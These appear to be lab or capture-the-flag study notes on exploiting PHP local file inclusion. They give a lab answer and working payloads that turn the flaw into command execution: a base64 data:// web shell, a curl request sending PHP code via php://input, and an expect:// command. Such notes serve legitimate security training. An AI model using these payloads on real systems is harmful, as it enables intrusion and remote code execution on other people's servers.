Questions
Using the file inclusion find the name of a user on the system that starts with "b".
barry
Submit the contents of the flag.txt file located in the /usr/share/flags directory.
The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
File Disclosure via PHP filters
To check for PHP configurations at /etc/php/X.Y/apache2/php.ini for Apache and /etc/php/X.Y/fpm/php.ini for Nginx.
RCE with allow-url_include On:
Data Wrapper method:
Payload:data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
Go to burpsuite, and enter the payload in LFI parameter lang
Input method:
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://159.65.95.114:31474/index.php?language=php://input&cmd=id" | grep uid
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Expect method:
Grep for expect after finding out php.ini source code
extension=expect
curl -s "http://159.65.95.114:31474/index.php?language=expect://id"
Last updated